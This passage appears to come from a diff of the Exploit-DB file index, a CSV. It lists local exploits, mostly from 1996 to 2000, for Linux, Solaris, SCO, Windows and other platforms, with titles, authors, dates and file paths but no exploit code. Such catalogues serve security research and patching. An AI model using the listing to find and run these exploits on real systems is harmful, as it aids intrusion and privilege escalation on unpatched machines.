(1)",1999-08-18,m0f0,local,linux, +19465,exploits/linux/local/19465.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Local Buffer Overflow (2)",1999-08-18,sk8,local,linux, +19467,exploits/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 - 'pt_chown' Local Privilege Escalation",1999-08-23,"Michal Zalewski",local,linux, +19469,exploits/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E Linux 6.0/6.1 - Cron Buffer Overflow (1)",1999-08-30,Akke,local,linux, +19470,exploits/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E Linux 6.0/6.1 - Cron Buffer Overflow (2)",1999-08-25,jbowie,local,linux, +19472,exploits/windows/local/19472.txt,"IBM GINA for NT 1.0 - Local Privilege Escalation",1999-08-23,"Frank Pikelner",local,windows, +19473,exploits/windows/local/19473.txt,"Microsoft Internet Explorer 5 - FTP Password Storage",1999-08-25,"Makoto Shiotsuki",local,windows, +19474,exploits/linux/local/19474.txt,"Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat 6.0 - Vixie Cron MAILTO Sendmail",1999-08-25,"Olaf Kirch",local,linux, +19480,exploits/multiple/local/19480.c,"ISC INN 2.2 / RedHat Linux 6.0 - inews Buffer Overflow",1999-09-02,bawd,local,multiple, +19485,exploits/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Local Buffer Overflow",1999-08-31,"Przemyslaw Frasunek",local,linux, +19497,exploits/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 - Local Buffer Overflow",1999-09-13,"Job de Haas of ITSX",local,multiple, +19498,exploits/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - 'dtspcd' Local Privilege Escalation",1999-09-13,"Job de Haas of ITSX",local,multiple, +19499,exploits/linux/local/19499.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (1)",1999-09-09,"Brock Tellier",local,linux, +19500,exploits/linux/local/19500.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (2)",1999-06-21,"The Dark Raver of CPNE",local,linux, +19501,exploits/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 / SunOS 4.1.4 - Local Buffer Overflow",1999-09-13,"Job de Haas of ITSX",local,linux, +19502,exploits/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation",1999-09-17,"Alberto Rodríguez Aragonés",local,windows, +19504,exploits/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 - GECOS Buffer Overflow",1999-09-21,"babcia padlina ltd",local,freebsd, +19506,exploits/windows/local/19506.txt,"MDAC 2.1.2.4202.3 / Microsoft Windows NT 4.0/SP1-6 JET/ODBC Patch / RDS Fix - Registry Key",1999-09-21,.rain.forest.puppy,local,windows, +19508,exploits/linux/local/19508.sh,"SuSE Linux 6.2 sscw - HOME Environment Variable Buffer Overflow",1999-09-23,"Brock Tellier",local,linux, +19509,exploits/solaris/local/19509.sh,"Solaris 2.6 - Profiling File Creation",1999-09-22,"Steve Mynott",local,solaris, +19510,exploits/linux/local/19510.pl,"SSH Communications Security SSH 1.2.27 - Authentication Socket File Creation",1999-09-17,"Tymm Twillman",local,linux, +19511,exploits/linux/local/19511.c,"Knox Software Arkeia 4.0 - Backup Local Overflow",1999-09-26,"Brock Tellier",local,linux, +19512,exploits/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0 / Gnome Libs 1.0.8 - 'espeaker' Local Buffer Overflow",1999-09-26,"Brock Tellier",local,linux, +19516,exploits/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS - ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",local,windows, +19517,exploits/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",local,linux, +19519,exploits/windows/local/19519.rb,"IrfanView JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow (Metasploit)",2012-07-01,Metasploit,local,windows, +19523,exploits/linux/local/19523.txt,"python-wrapper - Untrusted Search Path/Code Execution",2012-07-02,ShadowHatesYou,local,linux, +19528,exploits/windows/local/19528.txt,"Microsoft Internet Explorer 4.1/5 - Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",local,windows, +19529,exploits/solaris/local/19529.c,"Solaris 7.0 /usr/bin/mail - '-m' Local Buffer Overflow",1999-09-12,"Brock Tellier",local,solaris, +19533,exploits/solaris/local/19533.c,"Solaris 7.0 - 'ufsdump' Local Buffer Overflow (1)",1998-04-23,smm,local,solaris, +19534,exploits/solaris/local/19534.c,"Solaris 7.0 - 'ufsdump' Local Buffer Overflow (2)",1998-12-30,"Cheez Whiz",local,solaris, +19535,exploits/hp-ux/local/19535.pl,"HP-UX 10.20 newgrp - Local Privilege Escalation",1996-12-01,SOD,local,hp-ux, +19542,exploits/sco/local/19542.txt,"SCO Open Server 5.0.5 - 'userOsa' Symlink",1999-10-11,"Brock Tellier",local,sco, +19543,exploits/sco/local/19543.c,"SCO Open Server 5.0.5 - cancel Buffer Overflow",1999-10-08,"Brock Tellier",local,sco, +19544,exploits/linux/local/19544.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (1)",1996-10-25,"Vadim Kolontsov",local,linux, +19545,exploits/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - '/usr/bin/lpr' Buffer Overrun Privilege Escalation (2)",1996-10-25,"Vadim Kolontsov",local,bsd, +19546,exploits/multiple/local/19546.pl,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Local Overflow (1)",1997-04-17,"Pavel Kankovsky",local,multiple, +19547,exploits/multiple/local/19547.txt,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Local Overflow (2)",1997-04-17,"Willy Tarreau",local,multiple, +19551,exploits/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",local,multiple, +19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple, +19556,exploits/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",local,multiple, +19565,exploits/linux/local/19565.sh,"SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Privilege Escalation",1999-10-22,"Brock Tellier",local,linux, +19673,exploits/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 - Help File Backdoor",1999-12-10,"Pauli Ojanpera",local,windows, +19674,exploits/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program Debugging",1999-12-10,"Brock Tellier",local,sco, +19676,exploits/linux/local/19676.c,"xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (1)",2000-05-17,"Brock Tellier",local,linux, +19677,exploits/linux/local/19677.c,"xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Local Buffer Overflow (2)",2000-05-17,"Larry W. Cashdollar",local,linux, +19582,exploits/unix/local/19582.c,"IRIX 6.5 / Solaris 7.0 / Turbolinux 4.2 - 'uum' Local Buffer Overflow",1999-11-02,UNYUN,local,unix, +19583,exploits/unix/local/19583.c,"Turbolinux 3.5 b2 - 'canuum' Local Buffer Overflow",1999-11-02,UNYUN,local,unix, +19585,exploits/windows/local/19585.c,"Yamaha MidiPlug 1.1 b-j MidiPlug - Local Buffer Overflow",1999-11-02,UNYUN,local,windows, +19590,exploits/unix/local/19590.c,"Hylafax Hylafax 4.0.2 - Local Buffer Overflow",1999-11-03,"Brock Tellier",local,unix, +19594,exploits/windows/local/19594.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Spoolss.exe' DLL Insertion",1999-11-04,"Marc of eEye",local,windows, +19609,exploits/freebsd/local/19609.txt,"Muhammad M. Saggaf Seyon 2.14b - Relative Path",1999-11-08,"Shawn Hillis",local,freebsd, +19610,exploits/windows/local/19610.c,"IrfanView32 3.0.7 - Image File Buffer Overflow",1999-11-09,UNYUN,local,windows, +19633,exploits/windows/local/19633.txt,"Microsoft Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 - Riched Buffer Overflow",1999-11-17,"Pauli Ojanpera",local,windows, +19641,exploits/sco/local/19641.c,"SCO Unixware 7.0/7.0.1/7.1 - Xsco Buffer Overflow",1999-11-25,K2,local,sco, +19642,exploits/sco/local/19642.c,"SCO Unixware 7.0 - 'xlock(1)' 'Username' Local Buffer Overflow",1999-11-25,AK,local,sco, +19643,exploits/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer Overflow",1999-10-30,K2,local,sco, +19647,exploits/solaris/local/19647.c,"Solaris 7.0 - 'kcms_configure' Local Overflow / Privilege Escalation",1999-11-30,UNYUN,local,solaris, +19648,exploits/solaris/local/19648.c,"Solaris 7.0 - CDE dtmail/mailtool Buffer Overflow",1999-11-30,UNYUN,local,solaris, +19649,exploits/freebsd/local/19649.c,"FreeBSD 3.3 - 'gdc' Local Buffer Overflow",1999-12-01,"Brock Tellier",local,freebsd, +19650,exploits/freebsd/local/19650.txt,"FreeBSD 3.3 - 'gdc' Symlink",1999-12-01,"Brock Tellier",local,freebsd, +19651,exploits/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon SetGID Dialer",1999-12-01,"Brock Tellier",local,freebsd, +19652,exploits/freebsd/local/19652.c,"FreeBSD 3.3 - 'xmindpath' Local Buffer Overflow",1999-12-01,"Brock Tellier",local,freebsd, +19653,exploits/freebsd/local/19653.c,"FreeBSD 3.3 - 'angband' Local Buffer Overflow",1999-12-01,"Brock Tellier",local,freebsd, +40430,exploits/windows/local/40430.cs,"Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",local,windows, +19654,exploits/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin' Local Privilege Escalation",1998-12-02,"Brock Tellier",local,sco, +19655,exploits/linux/local/19655.txt,"RSA Security RSAREF 2.0 - Local Buffer Overflow",1999-12-14,"Alberto Solino",local,linux, +19656,exploits/sco/local/19656.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'xauto' Local Buffer Overflow",1999-12-03,"Brock Tellier",local,sco, +19657,exploits/sco/local/19657.txt,"SCO Unixware 7.1 - '/var/mail' Permissions",1999-12-03,"Brock Tellier",local,sco, +19658,exploits/sco/local/19658.txt,"SCO Unixware 7.1 - 'pkg' Local Privilege Escalation",1999-12-03,"Brock Tellier",local,sco, +19659,exploits/sco/local/19659.sh,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink",1999-12-03,"Brock Tellier",local,sco, +19660,exploits/sco/local/19660.c,"SCO Unixware 7.1 pkgcat - Local Buffer Overflow",1999-12-06,"Brock Tellier",local,sco, +19661,exploits/sco/local/19661.c,"SCO Unixware 7.1 pkginstall - Local Buffer Overflow",1999-12-06,"Brock Tellier",local,sco, +19665,exploits/windows/local/19665.txt,"Microsoft Internet Explorer 5 - vnd.ms.radio URL",1999-12-06,"Jeremy Kothe",local,windows, +19678,exploits/windows/local/19678.c,"VDOLive Player 3.0.2 - Local Buffer Overflow",1999-12-13,UNYUN,local,windows, +19683,exploits/windows/local/19683.c,"Ipswitch IMail Server 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 - Weak Password Encryption",1999-12-19,"Mike Davis",local,windows, +19684,exploits/multiple/local/19684.c,"SCO Open Server 5.0.5 / IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library - Local Buffer Overflow",1999-12-20,"Last Stage of Delirium",local,multiple, +19685,exploits/freebsd/local/19685.txt,"Windowmaker wmmon 1.0 b2 - Command Execution",1999-12-22,"Steve Reid",local,freebsd, +19692,exploits/multiple/local/19692.c,"Netscape Communicator 4.5 - prefs.js Buffer Overflow",1999-12-24,"Steve Fewer",local,multiple, +19693,exploits/linux/local/19693.txt,"Python - Untrusted Search Path/Code Execution",2012-07-09,rogueclown,local,linux, +19697,exploits/unix/local/19697.c,"IBM Network Station Manager 2.0 R1 - Race Condition",1999-12-27,"Brock Tellier",local,unix, +19698,exploits/linux/local/19698.txt,"Great Circle Associates Majordomo 1.94.4 - Local resend",1999-12-28,"Brock Tellier",local,linux, +19699,exploits/linux/local/19699.txt,"Majordomo 1.94.4/1.94.5 - Local -C Parameter (1)",1999-12-29,Shevek,local,linux, +19700,exploits/linux/local/19700.c,"Majordomo 1.94.4/1.94.5 - Local -C Parameter (2)",1999-12-29,morpheus[bd],local,linux, +19704,exploits/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 - PATH",1999-12-30,Loneguard,local,multiple, +19706,exploits/irix/local/19706.sh,"SGI IRIX 6.2 - 'midikeys'/'soundplayer' Local Privilege Escalation",1999-12-31,Loneguard,local,irix, +19707,exploits/unix/local/19707.sh,"Ascend CascadeView/UX 1.0 tftpd - Symbolic Link",1999-12-31,Loneguard,local,unix, +19709,exploits/linux/local/19709.sh,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path (1)",2000-01-04,dildog,local,linux, +19710,exploits/linux/local/19710.c,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path (2)",2000-03-15,"Elias Levy",local,linux, +19721,exploits/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 - GRANT Global Password Changing",2000-02-15,"Viktor Fougstedt",local,multiple, +19723,exploits/linux/local/19723.txt,"Corel Linux OS 1.0 - get_it PATH",2000-01-12,"Cesar Tascon Alvarez",local,linux, +19726,exploits/bsd/local/19726.c,"FreeBSD 3.4 / NetBSD 1.4.1 / OpenBSD 2.6 - '/proc' FileSystem",2000-01-21,Nergal,local,bsd, +19727,exploits/linux/local/19727.c,"Inter7 vpopmail (vchkpw) 3.4.11 - Local Buffer Overflow",2000-01-21,K2,local,linux, +19728,exploits/windows/local/19728.txt,"Microsoft Systems Management Server 2.0 - Default Permissions",1999-12-29,"Frank Monroe",local,windows, +19733,exploits/windows/local/19733.txt,"McAfee 4.0 / Network Associates for Windows NT 4.0.2/4.0.3 a / Norton AntiVirus 2000 - Recycle Bin Exclusion",1999-12-22,"Neil Bortnak",local,windows, +19735,exploits/linux/local/19735.txt,"Debian 2.1 - apcd Symlink",2000-02-01,anonymous,local,linux, +19739,exploits/windows/local/19739.txt,"Microsoft Windows NT 4.0 - Recycle Bin Pre-created Folder",2000-02-01,"Arne Vidstron & Nobuo Miwa",local,windows, +19752,exploits/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink",2000-02-15,"Shawn Bracken",local,sco, +19754,exploits/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - 'autorun.inf' Code Execution",2000-02-18,"Eric Stevens",local,windows, +19756,exploits/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Local Privilege Escalation",2000-02-19,anonymous,local,freebsd, +19757,exploits/solaris/local/19757.txt,"Sun Workshop 5.0 - Licensing Manager Symlink",2000-02-21,sp00n,local,solaris, +19762,exploits/linux/local/19762.c,"FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption",2000-02-25,"Nelson Brito",local,linux, +19763,exploits/linux/local/19763.txt,"RedHat Linux 6.0 - Single User Mode Authentication",2000-02-23,"Darren Reed",local,linux, +19764,exploits/linux/local/19764.txt,"Corel Linux OS 1.0 - buildxconfig",2000-02-24,suid,local,linux, +19765,exploits/linux/local/19765.txt,"Corel Linux OS 1.0 - 'setxconf' Local Privilege Escalation",2000-02-24,suid,local,linux, +19776,exploits/windows/local/19776.pl,"ZipItFast PRO 3.0 - Local Heap Overflow",2012-07-12,b33f,local,windows, +19778,exploits/linux/local/19778.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (1)",2000-02-26,"Babcia Padlina",local,linux, +19779,exploits/linux/local/19779.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (2)",2000-02-26,"Babcia Padlina",local,linux, +19787,exploits/linux/local/19787.txt,"Corel Linux OS 1.0 - Dosemu Distribution Configuration",2000-03-02,suid,local,linux, +19789,exploits/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Local Buffer Overflow",2000-03-06,dildog,local,windows, +19794,exploits/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer - Local Privilege Escalation",2000-03-05,"Keyser Soze",local,linux, +19796,exploits/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",local,multiple, +19798,exploits/windows/local/19798.txt,"Microsoft Windows NT 4.0 - User Shell Folders",2000-03-09,anonymous,local,windows, +19802,exploits/linux/local/19802.c,"Sam Hawker wmcdplay 1.0 beta1-2 - Local Buffer Overflow (1)",2000-03-11,Krahmer,local,linux, +19803,exploits/linux/local/19803.txt,"Sam Hawker wmcdplay 1.0 beta1-2 - Local Buffer Overflow (2)",2000-03-13,"Larry W. Cashdolla",local,linux, +19804,exploits/linux/local/19804.pl,"AT Computing atsar_linux 1.4 - File Manipulation",2000-03-11,"S. Krahmer",local,linux, +19811,exploits/linux/local/19811.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - 'imwheel' (1)",2000-03-13,funkysh,local,linux, +19812,exploits/linux/local/19812.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - 'imwheel' (2)",2000-03-13,"S. Krahmer & Stealth",local,linux, +19813,exploits/linux/local/19813.txt,"Halloween Linux 4.0 / SuSE Linux 6.0/6.1/6.2/6.3 - 'kreatecd' Local Privilege Escalation",2000-03-16,Sebastian,local,linux, +19816,exploits/linux/local/19816.txt,"gpm 1.18.1/1.19 / Debian 2.x / RedHat 6.x / S.u.S.E 5.3/6.x - gpm Setgid",2000-03-22,"Egmont Koblinger",local,linux, +19821,exploits/multiple/local/19821.c,"Citrix Metaframe 1.0/1.8 - Weak Encryption",2000-03-29,"Dug Song",local,multiple, +19823,exploits/unix/local/19823.txt,"Standard & Poors ComStock 4.2.4 - Command Execution",2000-03-24,kadokev,local,unix, +19836,exploits/windows/local/19836.c,"Symantec pcAnywhere 9.0 - Weak Encryption",2000-04-06,"Pascal Longpre",local,windows, +19837,exploits/linux/local/19837.c,"Bray Systems Linux Trustees 1.5 - Long Pathname",2000-04-10,"Andrey E. Lerman",local,linux, +19838,exploits/linux/local/19838.c,"CRYPTOCard CRYPTOAdmin 4.1 - Weak Encryption (1)",2000-04-10,kingpin,local,linux, +19839,exploits/windows/local/19839.txt,"CRYPTOCard CRYPTOAdmin 4.1 - Weak Encryption (2)",2000-04-10,kingpin,local,windows, +19840,exploits/beos/local/19840.txt,"Be BeOS 4.5/5.0 - Invalid System Call",2000-04-10,"Konstantin Boldyshev",local,beos, +19841,exploits/beos/local/19841.casl,"Be BeOS 4.0/4.5/5.0 - IP Packet Length Field",2000-04-07,"Tim Newsham",local,beos, +19851,exploits/qnx/local/19851.c,"QSSL QNX 4.25 A - 'crypt()' Local Privilege Escalation",2000-04-15,Sean,local,qnx, +19855,exploits/windows/local/19855.txt,"Panda Security 3.0 - Multiple Vulnerabilities",2000-04-17,Zan,local,windows, +19904,exploits/unix/local/19904.txt,"Intel Corporation NetStructure 7110 - Undocumented Password",2000-05-08,"Stake Inc",local,unix, +19867,exploits/linux/local/19867.txt,"SuSE Linux 6.x - Arbitrary File Deletion",2000-04-21,Peter_M,local,linux, +19872,exploits/solaris/local/19872.c,"Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (1)",2000-04-24,DiGiT,local,solaris, +19873,exploits/solaris/local/19873.c,"Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (2)",2000-04-24,"Theodor Ragnar Gislason",local,solaris, +19874,exploits/solaris/local/19874.c,"Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (3)",2000-04-24,"Theodor Ragnar Gislason",local,solaris, +19875,exploits/immunix/local/19875.txt,"PostgreSQL 6.3.2/6.5.3 - Cleartext Passwords",2000-04-23,"Robert van der Meulen",local,immunix, +19876,exploits/solaris/local/19876.c,"Solaris 7.0/8 - Xsun Buffer Overrun",2000-04-24,DiGiT,local,solaris, +19878,exploits/solaris/local/19878.c,"Solaris 2.6/7.0 - lp -d Option Buffer Overflow",2000-04-24,DiGiT,local,solaris, +19883,exploits/linux/local/19883.c,"SuSE Linux 6.3/6.4 Gnomelib - Local Buffer Overflow",2000-04-29,bladi,local,linux, +19894,exploits/windows/local/19894.txt,"Aladdin Knowledge Systems eToken 3.3.3 - eToken PIN Extraction",2000-05-04,kingpin,local,windows, +19900,exploits/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 - 'pam_console' Monitor Activity After Logout",2000-05-03,"Michal Zalewski",local,linux, +19910,exploits/solaris/local/19910.c,"Solaris 2.6/7.0/8 - 'netpr' Local Buffer Overflow (1)",1999-05-23,ADM,local,solaris, +19911,exploits/solaris/local/19911.c,"Solaris 2.6/7.0/8 - 'netpr' Local Buffer Overflow (2)",1999-03-04,ADM,local,solaris, +19912,exploits/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - '/tmp' Symlink",2000-05-10,foo,local,multiple, +19915,exploits/linux/local/19915.txt,"KDE 1.1/1.1.1/1.2/2.0 kscd - SHELL Environmental Variable",2000-05-16,Sebastian,local,linux, +19925,exploits/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Local Buffer Overflow (2)",2000-05-26,"Jim Paris",local,linux, +19930,exploits/windows/local/19930.rb,"Microsoft Windows - Task Scheduler '.XML' Local Privilege Escalation (MS10-092) (Metasploit)",2012-07-19,Metasploit,local,windows, +19933,exploits/linux/local/19933.rb,"Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalation (Metasploit)",2012-07-19,Metasploit,local,linux, +19946,exploits/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink",2000-04-21,anonymous,local,linux, +19952,exploits/linux/local/19952.c,"S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Local Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",local,linux, +19953,exploits/linux/local/19953.c,"S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Local Buffer Overflow (2)",2000-05-22,Scrippie,local,linux, +19954,exploits/linux/local/19954.c,"S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Local Buffer Overflow (3)",2000-05-22,WaR,local,linux, +19955,exploits/linux/local/19955.c,"Cobalt RaQ 2.0/3.0 / qpopper 2.52/2.53 - 'EUIDL' Format String Input",2000-05-24,Prizm,local,linux, +19967,exploits/multiple/local/19967.txt,"Omnis Studio 2.4 - Weak Database Field Encryption",2000-05-25,Eric.Stevens,local,multiple, +19968,exploits/windows/local/19968.c,"Microsoft Windows Server 2000/95/98/NT 4.0 - Long Filename Extension",2000-04-21,"Laurent Eschenauer",local,windows, +19969,exploits/linux/local/19969.c,"Mandriva Linux Mandrake 7.0 - Local Buffer Overflow",2000-05-29,noir,local,linux, +19970,exploits/linux/local/19970.c,"KDE 1.1/1.1.1/1.1.2/1.2 - kdesud DISPLAY Environment Variable Overflow",2000-05-27,noir,local,linux, +19971,exploits/unix/local/19971.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - ELM Buffer Overflow (1)",2000-05-07,Scrippie,local,unix, +19972,exploits/unix/local/19972.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - ELM Buffer Overflow (2)",2000-05-27,Buffer0verfl0w,local,unix, +19979,exploits/linux/local/19979.pl,"KDE 1.1.2 KApplication configfile - Local Privilege Escalation (1)",2000-05-31,kil3r,local,linux, +19980,exploits/linux/local/19980.pl,"KDE 1.1.2 KApplication configfile - Local Privilege Escalation (2)",2000-05-31,kil3r,local,linux, +19981,exploits/linux/local/19981.sh,"KDE 1.1.2 KApplication configfile - Local Privilege Escalation (3)",2000-05-31,IhaQueR,local,linux, +19989,exploits/windows/local/19989.c,"PassWD 1.2 - Weak Encryption",2000-06-04,"Daniel Roethlisberger",local,windows, +19990,exploits/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 - man '/tmp' Symlink",2000-06-02,"Jason Axley",local,hp-ux, +19991,exploits/linux/local/19991.c,"BSD 'mailx' 8.1.1-10 - Local Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",local,linux, +19992,exploits/linux/local/19992.c,"mailx 8.1.1-10 (BSD/Slackware) - Local Buffer Overflow (2)",1999-07-03,funkysh,local,linux, +19993,exploits/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",local,windows, +19999,exploits/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",local,multiple, +20000,exploits/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Sendmail Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",local,linux, +20001,exploits/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Sendmail 8.10.1 Capabilities Privilege Escalation (2)",2000-06-07,"Wojciech Purczynski",local,linux, +20002,exploits/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 - '.SNMPD' File Permission",2000-06-07,loveyou,local,hp-ux, +20003,exploits/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 - Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",local,solaris, +20004,exploits/linux/local/20004.c,"Stelian Pop dump 0.4 - restore Buffer Overflow",2000-06-07,"Stan Bubrouski",local,linux, +20012,exploits/windows/local/20012.txt,"Computer Associates eTrust Intrusion Detection 1.4.1.13 - Weak Encryption",2000-06-07,Phate.net,local,windows, +20013,exploits/linux/local/20013.c,"Sam Lantinga splitvt 1.6.3 - Local Buffer Overflow",2000-06-01,Syzop,local,linux, +20014,exploits/solaris/local/20014.c,"Solaris 2.5/2.6/7.0/8 ufsrestore - Local Buffer Overflow",2000-06-14,"Job de Haas of ITSX",local,solaris, +20018,exploits/solaris/local/20018.txt,"Veritas Software Volume Manager 3.0.2/3.0.3/3.0.4 - File Permission",2000-06-16,"Dixie Flatline",local,solaris, +20021,exploits/linux/local/20021.txt,"RedHat 6.2 - Piranha Virtual Server Package Plaintext Password",2000-06-09,arkth,local,linux, +20022,exploits/windows/local/20022.txt,"HM Software S to Infinity 3.0 - Multiple Vulnerabilities",2000-06-15,Synapt1c,local,windows, +20024,exploits/linux/local/20024.c,"Mandrake 7.0/7.1 / RedHat Kon2 0.3.9 - '/usr/bin/fld' Input File Overflow",2000-08-01,E-Ligth,local,linux, +20036,exploits/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow",2012-07-23,mr.pr0n,local,windows, +20042,exploits/unix/local/20042.c,"Flowerfire Sawmill 5.0.21 - Weak Password Encryption",2000-06-26,"Larry W. Cashdollar",local,unix, +20045,exploits/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 - libX11 '_XAsyncReply()' Stack Corruption",2000-06-19,"Chris Evans",local,linux, +20053,exploits/windows/local/20053.py,"MyMp3 Player Stack - '.m3u' File DEP Bypass",2012-07-23,"Daniel Romero",local,windows, +20056,exploits/unix/local/20056.c,"Visible Systems Razor 4.1 - Password File (1)",2000-06-16,pbw,local,unix, +20058,exploits/unix/local/20058.pl,"Visible Systems Razor 4.1 - Password File (2)",2000-06-15,"Shawn A. Clifford",local,unix, +20073,exploits/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 - Insecure Perl 'open' Code Execution",2000-07-12,"Joey Hess",local,unix, +20081,exploits/windows/local/20081.c,"NetZero ZeroPort 3.0 - Weak Encryption Method",2000-07-18,"Brian Carrier",local,windows, +20092,exploits/cgi/local/20092.txt,"Sean MacGuire Big Brother 1.0/1.3/1.4 - CGI File Creation",2001-06-11,xternal,local,cgi, +20093,exploits/linux/local/20093.c,"Stanley 